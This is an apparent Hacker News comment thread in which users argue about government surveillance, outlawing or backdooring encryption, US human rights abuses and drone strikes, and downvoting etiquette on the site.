Politicians, generally, are not hypocrites. That implies the guise of good faith. Do you really think the biggest beneficiaries of terrorism are likely to be honest with you? Humans just like being told what to do and what to fear and whom to be mad at, and politicians make eager use of this role.
From the government's perspective, they are to keep "us" safe. It's easier to do that if no one's safe from us. :)
Granted, that's a little over-ominous because the government's mission statement is to keep its people safe, and it's also elected by its people. Either of these two facts changing is the way bigger danger; backdooring centralized services is stuff that happens in the meantime either way.
Even if this or that individual politician gets voted out, or even ten of them, it won't stop the machine's influence. They're still the ones who decide who the replacements can be chosen from.
Strangely, HN is also very much in favor of the administration’s trade protectionism.
Yes. Absolutely. That's the only logical endgame.
That's pretty far detached from real rocketry.
A similar metaphor for computing would be the allowed use of a LeapFrog system, rather than a computer.
'My cryptography hobby is going pretty well, I just practiced a Caesar cipher on my LeapFrog.'
(neither a LeapFrog or a model rocket being a practical equivalent to their big relative.)
If the goal is to catch malicious people that are trying to hide their communications, then outlawing encryption won't work. But it will give the government a good excuse to spy on people.
I don't think this is the right analogy - instead, I think a better statement would be "you can't outlaw random numbers".
A random number and the ciphertext output of a secure encryption algorithm should be indistinguishable.
I don't think I am being naive to think that even in our wildest dystopian nightmares there is no real path from (current jurisprudence in five-eyes jurisdictions) to (random numbers being illegal).
And you can bet those people do understand encryption.
As far as Slack goes... I trust them as much as I trust Discord: I do not.
Residents of the US are still free to use whatever mathematical algorithm they want to encrypt their comms. Transporting OTP's across physical borders is trivial, and not technically illegally if not mistaken. Strong encryption is open source as you've pointed out. There's no law against using those open source libraries, nor any discussion to try to censor/outlaw them, AFAIK.
Policing the airwaves and internet pipes hardly qualifies as some major abuse of human rights, particularly when the best that the Intercept/Snowden crowd can come up with regarding things like "Parallel Reconstruction" is "abuse" of "surveillance power" to catch, e.g., methamphetamine traffickers .
edit: Downvote due to disagreement? This seems to be the mantra of HN in recent years.
The leaders of today are not the same as those of tomorrow - sweeping powers to invade anyone's privacy and communications could easily be used for nefarious purposes. I don't trust our current leaders with such powers, much less potentially worse ones.
> Residents of the US are still free to use whatever mathematical algorithm they want to encrypt their comms. Transporting OTP's across physical borders is trivial, and not technically illegally if not mistaken. Strong encryption is open source as you've pointed out. There's no law against using those open source libraries, nor any discussion to try to censor/outlaw them, AFAIK.
Do you really think things will stay this way?
It seems to me that TFA is just the next step on a slow, but steady, march towards an authoritarian nightmare - once they've worn us down some more, there will be serious moves against encryption (it's happened before, and politicians have been bringing it up a lot in the past 10 years or so).
I think it's ok to use the up and down arrows to express agreement. Obviously the uparrows aren't only for applauding politeness, so it seems reasonable that the downarrows aren't only for booing rudeness.
It only becomes abuse when people resort to karma bombing: downvoting a lot of comments by one user without reading them in order to subtract maximum karma. Fortunately we now have several levels of software to protect against that.
Please don't comment about the voting on comments. It never does any good, and it makes boring reading.
But I always always downvote complaints about downvotes, such as your edit.
I downvote quite rarely in HN over disagreeing with someone. Usually it is when I don't feel the reply adds any value, and is actually negative for the discourse.
That is, e.g doesn't reach me anything about the opposing position, or is argumentative without any substance, but distracting from comments that are more constructive.
Of course other people use different judgement. At the same time, HN doesn't hide comments to a great extent. Even 'dead' comments are optionally visible (with the 'showdead' setting) and quite a few of us read HN with that on. It's very rare for downvotes to silence people here who aren't actively disruptive.
Couple that with first enabling downvotes when people hit a certain karma threshold, and various other limitations, and HN is free of a lot of the downvote problems of other places.
That to me makes it less of an issue if people downvote to signal disapproval here.
Often initial downvotes will be countered when people feel a comment has been downvotes too much as well.
If you are US citizen maybe, for the rest of the world. Definitively not.
Without being a lawyer, I'm pretty sure random drone strike on civilians in Pakistan, torture in Guantanamo or intercepting entire world communication is not an example of "respect of humans rights".
This is a good point, I think. The US has an appalling record on human rights (aside from your examples, arming terrorists and overthrowing democratically elected governments spring to mind) - as long as we're talking about the rights of non-Americans.
Some of those individuals were guilty of little more than political activism but experienced real harm (e.g. deportation) thanks to surveillance overreach.
Which in practice is done by using machine learning  on huge data sets gathered with that global surveillance enabled trough Five Eyes.
Because the army of humans that could manually sort trough those zettabytes of data has yet to be cloned. All that ends up in the fancy-sounding "disposition matrix"  aka the USGs kill-list. It's just systems upon systems doing their thing and nobody is directly responsible or accountable for anything that ends up happening, like when yet another 30 Afghani farmers get "splatted" by accident .
Considering how this has been going on for close to two decades, and the US has a very convenient way going about the casualty statistics , I guess these Afghani farmers are just another rounding error in the "war on terror". Figures, because before that they were mostly considered biometric cattle  and lab-rats for fantasies about "full-spectrum surveillance" .
Note: Under Trump, the USG now even stopped releasing their shined up drone statistics. So it's pretty much impossible to know the full scale about what's still going on to this day.
I mostly remember the headline, Google does the rest of leading me back to the article.